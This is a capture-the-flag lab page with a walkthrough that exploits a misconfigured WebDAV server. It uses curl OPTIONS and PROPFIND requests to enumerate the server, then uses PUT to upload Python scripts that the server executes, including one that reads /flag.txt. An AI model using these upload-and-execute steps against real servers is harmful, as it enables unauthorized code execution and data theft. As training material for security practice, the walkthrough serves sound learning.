Lab Icon

WebDAV Explorer

📁 Can you exploit the WebDAV server to access restricted files?

Challenge 23 Nov 2025 Pro Exclusive Solution Available

This corporate file server uses WebDAV for remote file management, but a misconfiguration in the access controls creates a dangerous security flaw. 📂 Many organizations rely on WebDAV for file sharing and collaboration, making it a common target for attackers seeking to upload malicious files or access sensitive data. Master this file server exploitation technique and discover how weak WebDAV configurations can lead to complete system compromise! 🎯

1
Flags
5
Points
88%
Success Rate
Start Your Challenge
~1-2 min setup
Dedicated server
Private instance
Industry standard
This solution is for Flags Mode

This walkthrough explains how to hack the lab and capture the flags. For help with Learning Mode questions, use the Request Hint button next to each question.

Challenge

📁 WebDAV Explorer - Complete Solution

Objective: Exploit WebDAV server misconfigurations to upload Python files and achieve remote code execution to access the system flag.
🔍 Step 1: WebDAV Discovery

Test if the server supports WebDAV by using HTTP OPTIONS method:

curl -X OPTIONS http://<target-ip>/ -v

Look for WebDAV methods in the Allow header: PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, PUT

🔍 Step 2: Directory Enumeration

Use PROPFIND method to enumerate directories and files:

curl -X PROPFIND http://<target-ip>/webdav/

This reveals the WebDAV directory structure with existing files and folders.

🔍 Step 3: File Upload Testing

Test file upload capability using PUT method:

curl -X PUT http://<target-ip>/webdav/test.txt -d "Hello WebDAV"

Successful upload indicates the server accepts file uploads via WebDAV.

🔍 Step 4: Python File Upload

Upload a Python script to test code execution:

curl -X PUT http://<target-ip>/webdav/test.py -d "import os; print('Current directory:', os.getcwd())"
🔍 Step 5: Code Execution Discovery

Access the uploaded Python file to test execution:

curl http://<target-ip>/webdav/test.py

If the server executes Python files, you'll see the script output instead of the source code.

🔍 Step 6: Flag Extraction

Upload a Python script to read the system flag:

curl -X PUT http://<target-ip>/webdav/getflag.py -d "import os; print(open('/flag.txt').read())"
🔍 Step 7: Execute Flag Script

Access the flag extraction script to retrieve the flag:

curl http://<target-ip>/webdav/getflag.py

The server executes the Python code and returns the flag content from /flag.txt.

🛡️ Security Implications

This vulnerability demonstrates how WebDAV servers with code execution capabilities can lead to complete system compromise through file upload and remote code execution attacks.